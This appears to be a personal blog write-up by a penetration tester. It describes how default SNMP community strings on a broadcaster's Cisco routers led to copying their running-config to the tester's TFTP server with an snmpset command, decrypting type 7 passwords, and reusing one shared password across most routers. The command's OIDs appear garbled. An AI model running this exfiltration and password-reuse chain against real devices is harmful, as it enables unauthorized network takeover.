I am a security researcher, I have over 4 years with penetration testing job. This is the first time I write a blog, I would like to share some experience in real life hacking for people who enjoy it and want to becomeÂ âHackerâ.
TLDR: In this post, I will share how I find the critical vulnerability in the system of one of the biggest television broadcasters in my country. The vulnerability could lead to take over almost all their public routers.
My task is finding vulnerabilities in television broadcasterâs system that include all their public IP address. The vulnerability could be low and medium severity like XSS, CSRF, Missing X-Frame Option, information disclosure, but my goal is always try to find the high severity vulnerabilities like SQL injection, and vulnerability that lead to remote code execution (RCE) or account takeover.
Finding attack surface
As usual I identified the attack surface, I enumerated all their subdomain by using dnsenum, theHaverster,Â â¦ and some online tool like google hacking database (GHDB). I also used Nmap to ping sweep CIDR to find online hosts.
After using above methods and some another methods, I found about 50 online hosts. Then I used nmap to detect what services (and their version) are running on each host (with -A and -sC options).
Finding the vulnerabilities but gotÂ nothing
The numbers of host is pretty big, so I took a few days to review all services to find vulnerabilities. There are some sensitive services that exposed to public like SSH, MySQL, telnet, RDP, but it seem all these services are up to date. Try to use nmap to scan fullport with -p- option but didnât pick up anything useful. So I looked deeper to those hosts that running web app but after two week, the only thing I got are few XSSes. I am not underrate XSS vulnerability, in some case it could be high potential when chained with CSRF,â¦ but in my case, the affected web app is less importance and the user is very specific. I tried finding more in shodan butÂ no hope. My report seem to be stopped with some medium vulnerabilities (the highest potential is XSS).
What am I missing?
As said before, my goal is try to find high risk vulnerabilities so I looked back to see what I am missing: enum subdomain, ping sweep with many methods, scan full port, detect all serviceÂ â¦ wait I know what I am missing, I scanned only TCP ports but not UDP. Straightway I scanned UDP services (nmap with -sU option) in all hosts I identified before. I found 12 IPs running SNMP (161/UDP), all are cisco routers. SNMP is interesting port, according to the wiki: Simple Network Management Protocol (SNMP) is an Internet Standard protocol forÂ collectingÂ and organizing information about managed devices on IP networks and forÂ modifyingÂ that information toÂ change device behavior. Let pay attention to the wordsÂ collecting,Â modifying,Â yes you can read and write information on the device. SNMP use public community string for read access and private community string for read and write accessâââThe âSNMP Community stringâ is like a user id or password that allows access to a routerâs or other deviceâs statistics.
After found SNMP services on 12 routers, I used snmp-check to identify community string. Surprise all are using default public community string, I checked write access with default public community string but not permitted.
With default public community string I can only read the information like system up time, IP address of each interface, TCP connections, listening ports
So what about private community string, I checked default private community string on over half of those routers but seem them not used it. Not gave up, I tried on other half, luckily four of them using default private community string and I had write access.
With SNMP write access you can using snmpset to upload running-config of the router to own TFTP server with following command:
snmpset -v 1 -c privateÂ target-IPÂ .126.96.36.199.188.8.131.52.184.108.40.206.1.2.1337 i 1Â .220.127.116.11.18.104.22.168.22.214.171.124.1.3.1337 i 4Â .126.96.36.199.188.8.131.52.184.108.40.206.1.4.1337 i 1Â .220.127.116.11.18.104.22.168.22.214.171.124.1.5.1337 aÂ TFTP-IPÂ .126.96.36.199.188.8.131.52.184.108.40.206.1.6.1337 s âconf.txtâÂ .220.127.116.11.18.104.22.168.22.214.171.124.1.14.334 i 4
I am not explain detail above command on this post, you can google for it.
But the first try, I got nothing, I not found any file on my server. I looked back to see what wrong, I thought nothing wrong here, I should be got my file. Try again with another router, woaa!!! It success this time, I got running-config of three over four router with default private community string. I realized the very first router should be behind firewall that block all outbound traffics.
After got running-config I found the username and password of ssh and telnet service, encrypted in cisco type 7 password, it easily to decrypt with online tools. Try to access with credential just achieved, sure I can access them:
Thing out of the box
Now I can do anything in these routers. Moreover, the interesting thing is all used same password, so I tried access others routers, that not used default private community string and the one I didnât get running-config. Bingo!!!! Only 2 of them I cannot access, the rest use same password as the result I can fully access 10 over 12 public cisco routers, addition 2 DrayTek routers.
From that I can dig deeper to their system. In this post, I will stop here, the post-exploit may be I will write in the future.
I hope you enjoy! Thanks for reading.